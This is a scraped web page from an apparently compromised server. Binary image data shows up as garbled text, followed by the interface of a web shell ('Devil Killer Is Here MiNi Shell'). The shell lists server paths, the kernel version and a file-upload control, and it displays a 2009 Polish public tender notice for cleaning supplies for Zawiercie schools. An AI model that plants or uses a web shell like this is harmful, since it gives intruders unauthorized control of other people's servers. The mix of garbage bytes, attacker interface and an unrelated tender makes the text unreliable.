JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090128/29723-N-2009.html

<p class="kh_header"><b>Zawiercie: Zakup i dostawa artykułów chemicznych i akcesoriów do sprzątania dla placówek oświatowo-wychowawczych dla których  organem prowadzącym  jest Powiat Zawierciański oraz Gospodarstwa Pomocniczego - Ośrodek  Szkoleniowo  -Wypoczynkowy  przy ZOEASiPOW w Zawierciu, z siedzibą w Jeziorowicach   25.</b><br>
<b>Numer ogłoszenia: 29723 - 2009; data zamieszczenia: 28.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Placówek Oświatowo-Wychowawczych w Zawierciu , ul. Macieja Rataja 29a, 42-400 Zawiercie, woj. śląskie, tel. 032 6710254.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów chemicznych i akcesoriów do sprzątania dla placówek oświatowo-wychowawczych dla których  organem prowadzącym  jest Powiat Zawierciański oraz Gospodarstwa Pomocniczego - Ośrodek  Szkoleniowo  -Wypoczynkowy  przy ZOEASiPOW w Zawierciu, z siedzibą w Jeziorowicach   25..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -pasty, płyny, emulsje, proszki do prania, mydła, środki dezynfekujace, odświeżacze powietrza, środki do usuwania kamienia
-ścierki
-wiadra, gąbki, uchwyty na ręczniki i papiery, miski, kije, szczotki, łopaty do śniegu, wycieraczki 
-żarówki)
- zapachy do muszli, krążki dezynfekujace
-rękawice, worki na śmieci.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-8, 39.50.00.00-7, 39.20.00.00-4, 31.50.00.00-1, 24.40.00.00-8, 19.50.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. 
	Wadium musi obejmować okres związania ofertą tj. do dnia 13.03.2009 r.
Wadium może być wnoszone w jednej lub kilku następujących formach:
1.	pieniądzu,
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, w tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych,
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /Dz. U. Nr 109, poz. 1158, z późn. zm./.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający wymaga, aby wadium składane w formie innej niż pieniężna wskazywało na wszystkich Wykonawców składających ofertę wspólną.
Wadium w formie pieniężnej powinno zostać wniesione na rachunek bankowy zamawiającego przed upływem terminu składania ofert . 
Nr konta zamawiającego, na które należy wpłacić wadium:
BOŚ O/Katowice 09 1540 1128 2001 7144 7124 0007
Wadium wniesione w formie pieniężnej zamawiający będzie przechowywać na rachunku bankowym.
Wadium wniesione w innej formie niż pieniężna należy zdeponować w kasie budynku zamawiającego w terminie do dnia i godziny składania ofert tj. do dnia 12.02.2009 r. 
do godz. 900 
Wysokość wadium wynosi:
-	 dla I części: 1 000 zł (jeden tysiąc złotych )
-	dla II części: 100 zł (sto złotych) 
Zwrot lub zatrzymanie wadium nastąpi zgodnie z art. 46 Ustawy Prawo Zamówień Publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca ubiegający się o zamówienie  musi  spełnić  warunki  określone  w art. 22 ust.1    ustawy  PZP.
1.1. Zamawiający celem potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej  działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP, żąda załączenia do oferty następujących dokumentów:
a)wypełnionego oświadczenia wykonawcy  wg Załącznika Nr 3 do SIWZ (w przypadku składania oferty przez podmioty występujące wspólnie, ww. dokument musi być złożony przez każdego  wykonawcę ),
b)aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia  do ewidencji  działalności  gospodarczej, wystawionego nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert (w przypadku składania oferty przez podmioty występujące wspólnie, ww. dokument musi być złożony przez każdego  wykonawcę ),
c)aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego  odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku składania oferty przez podmioty występujące wspólnie, ww. dokument musi być złożony przez każdego wykonawcę),
d)aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku składania oferty  przez podmioty występujące wspólnie, ww. dokument musi  być złożony  przez każdego  wykonawcę),
1.1.1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej (na podstawie Rozporządzenia Prezesa Rady Ministrów  z dnia 19.05.2006 r. W sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane - Dz. U. z 2008r. Nr 188, poz. 1155), zamiast  dokumentów, o których mowa  w punkcie 1.1. :
1)	lit. b, c, d - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
- nie otwarto jego likwidacji  ani nie  ogłoszono  upadłości (wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
- nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawionego  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert);
   1.1.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub   miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.1.1.1  tego punktu, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepisy pkt.1.1.1 dotyczące terminów stosuje się odpowiednio.
1.2.  W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
     	 Zamawiający żąda następujących dokumentów:
- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia  działalności  jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom  stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wg  Zał.    Nr 4 oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie; za spełnienie warunku uważać się będzie wykazaniem minimum jednej dostawy w okresie 1 roku o charakterze porównywalnym do przedmiotu zamówienia. W przypadku składania oferty przez Wykonawców  ubiegających się wspólnie o udzielenie zamówienia, ww. warunek  mogą oni spełnić łącznie.
Zamawiający dopuszcza przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a) wypełnione oświadczenie wykonawcy  wg Załącznika Nr 3 do SIWZ ,
b) aktualny  odpis z właściwego rejestru albo aktualne zaświadczeni o wpisie do ewidencji działalności gospodarczej, 
c)aktualne zaświadczeni właściwego naczelnika urzędu skarbowego ,
d)aktualne zaświadczeni właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
e)wypełniony  wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw  wg  Zał.    Nr 4 oraz załączenie dokumentów potwierdzających, że dostawy te zostały wykonane należycie;
f) wypełniony druk OFERTA wg Załącznika Nr 1 wraz z Załącznikiem 
Nr  2 i lub 2a 
g)parafowany wzór umowy (Zał. Nr 5 i lub 5a )
h)pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów
i)dowód wpłaty wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoeas.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół obsługi Ekonomiczno- Administracyjnej Szkół i PLacówek Oświatowo-Wychowawczych , 42-400 Zawiercie , ul.Rataja 29 a pok nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2009 godzina 09:00, miejsce: Zespół obsługi Ekonomiczno- Administracyjnej Szkół i PLacówek Oświatowo-Wychowawczych , 42-400 Zawiercie , ul.Rataja 29 a pok nr 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa artykułów chemicznych i akcesoriów do sprzątania dla placówek oświatowo - wychowawczych prowadzonych przez Powiat Zawierciański.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -pasty, płyny, emulsje, proszki do prania, mydła, środki dezynfekujace, odświeżacze powietrza, środki do usuwania kamienia
-ścierki
-wiadra, gąbki, uchwyty na ręczniki i papiery, miski, kije, szczotki, łopaty do śniegu, wycieraczki 
-żarówki
- zapachy do muszli, krążki dezynfekujace
- rękawice, worki na śmieci.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-8, 39.50.00.00-7, 31.50.00.00-1, 24.40.00.00-8, 19.50.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa artykułów chemicznych i akcesoriów do sprzątania dla Gospodarstwa Pomocniczego w Jeziorowicach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -pasty, płyny, emulsje, proszki do prania, mydła, środki dezynfekujace, odświeżacze powietrza, środki do usuwania kamienia
-ścierki
-wiadra, gąbki, uchwyty na ręczniki i papiery, miski, kije, szczotki, łopaty do śniegu, wycieraczki 
-żarówki
-zapachy do muszli, krążki dezynfekujace
- rękawice, worki na śmieci.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-8, 39.50.00.00-7, 39.20.00.00-4, 31.50.00.00-1, 24.40.00.00-8, 19.50.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com